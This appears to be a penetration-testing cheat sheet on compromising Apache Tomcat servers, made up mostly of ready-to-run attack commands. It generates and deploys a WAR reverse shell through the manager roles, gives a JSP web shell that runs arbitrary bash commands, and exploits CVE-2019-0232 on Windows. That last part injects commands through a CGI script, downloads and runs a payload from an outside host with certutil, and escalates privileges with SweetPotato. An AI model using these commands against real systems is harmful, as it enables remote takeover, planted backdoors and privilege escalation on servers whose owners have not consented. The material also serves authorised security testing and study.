#############
Apache Tomcat
#############

| Doc V10 : https://tomcat.apache.org/tomcat-10.0-doc/manager-howto.html
| Doc V9  : https://tomcat.apache.org/tomcat-9.0-doc/manager-howto.html
| Doc V8  : https://tomcat.apache.org/tomcat-8.0-doc/manager-howto.html
| Doc V7  : https://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html
| Doc V6  : https://tomcat.apache.org/tomcat-6.0-doc/manager-howto.html

*******************
Manager-script Role
*******************

| Steps to exploit the Apache Tomcat manager-script role
| 
| Generate WAR reverse shell:

.. code-block:: bash

  msfvenom -p java/shell_reverse_tcp lhost=4.3.2.1 lport=4444 -f war -o reverse.war

| Then deploy the WAR file to the target's tomcat service with manager access 
| (V6 and under use /manager/deploy path instead of /manager/text/deploy)

.. code-block:: bash

  curl -v -u user:'password' -T 'reverse.war' 'http://1.2.3.4:8080/manager/text/deploy?path=/cmd&update=true'

| Start your ``netcat`` listener:

.. code-block:: bash

  nc -lvp 4444

| Call war application to trigger reverse shell execution and initiate the connection:

.. code-block:: bash

  curl https://1.2.3.4:8080/cmd

****************
Manager-gui Role
****************

| Sometimes only the GUI role is enabled for administration, 
| and you don't have direct access to it because of network limitation of tomcat or host.

.. code-block:: bash

   # Load web page to retrieve cookies to cookies file and CSRF token
   CSRF=$(curl -sS "http://user:password@localhost:8080/manager/html" -b cookies -c cookies | grep jsession | tail -n1 | sed 's#.*CSRF_NONCE=\([^\"]*\).*#\1#')

   # Deploy war 
   curl -v -b cookies -c cookies -F "deployWar=@pwn.war" "http://user:password@localhost:8080/manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=$CSRF"

****************
WAR/JSP Creation
****************

| Create index.jsp file

.. code-block:: jsp

  <FORM METHOD=GET ACTION='index.jsp'>
  <INPUT name='cmd' type=text>
  <INPUT type=submit value='Run'>
  </FORM>
  <%@ page import="java.io.*" %>
  <%
     String cmd = request.getParameter("cmd");
     String[] args = {"/bin/bash", "-c", cmd};
     String output = "";
     if(cmd != null) {
        String s = null;
        try {
           Process p = Runtime.getRuntime().exec(args);
           BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
           while((s = sI.readLine()) != null) { output += s+"</br>"; }
        }  catch(IOException e) {   e.printStackTrace();   }
     }
  %>
  <pre><%=output %></pre>

| Create war

.. code-block:: bash
   
  mkdir pwn/ && cp index.jsp pwn/ && cd pwn/
  jar -cvf ../pwn.war * && cd ../

|


|

*******************
CVE-2019-0232 (Win)
*******************

| Search for a cgi script

.. code-block:: bash

  ffuf -w /usr/share/SecLists/Discovery/Web-Content/raft-large-directories.txt -u http://target:8080/cgi/FUZZ.bat -fc 404 -t 500 -c 

|

| Exploit (i had to use full path for every cmd)

.. code-block:: bash

  CMD="C:\windows\system32\whoami.exe /all"
  CMD=$(echo -e "$CMD" | tr -d '\n' | python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))" | tr -d '\n')
  curl "http://target:8080/cgi/welcome.bat%20?&&$CMD"

|

| Download payload

.. code-block:: bash

  CMD='C:\windows\system32\certutil.exe -urlcache -split -f http://10.10.14.4/r32.exe c:\users\tom\r32.exe'
  CMD="$(echo $CMD | tr -d '\n' | python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))" | tr -d '\n')"
  echo "http://target:8080/cgi/welcome.bat%20%20?&&$CMD"
  curl "http://target:8080/cgi/welcome.bat%20%20?&&$CMD"

|

| Exec payload

.. code-block:: bash

  CMD='c:\users\tom\r32.exe'
  CMD="$(echo $CMD | tr -d '\n' | python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))" | tr -d '\n')"
  echo "http://target:8080/cgi/welcome.bat%20%20?&&$CMD"
  curl "http://target:8080/cgi/welcome.bat%20%20?&&$CMD"

|

| SeImpersonate

.. code-block:: bash

  C:\windows\system32\certutil.exe -urlcache -split -f http://10.10.14.4/SweetPotato.exe c:\users\tom\SweetPotato.exe
  c:\users\tom\SweetPotato.exe -e EfsRpc -p c:\users\tom\r32.exe -a '--child'

|
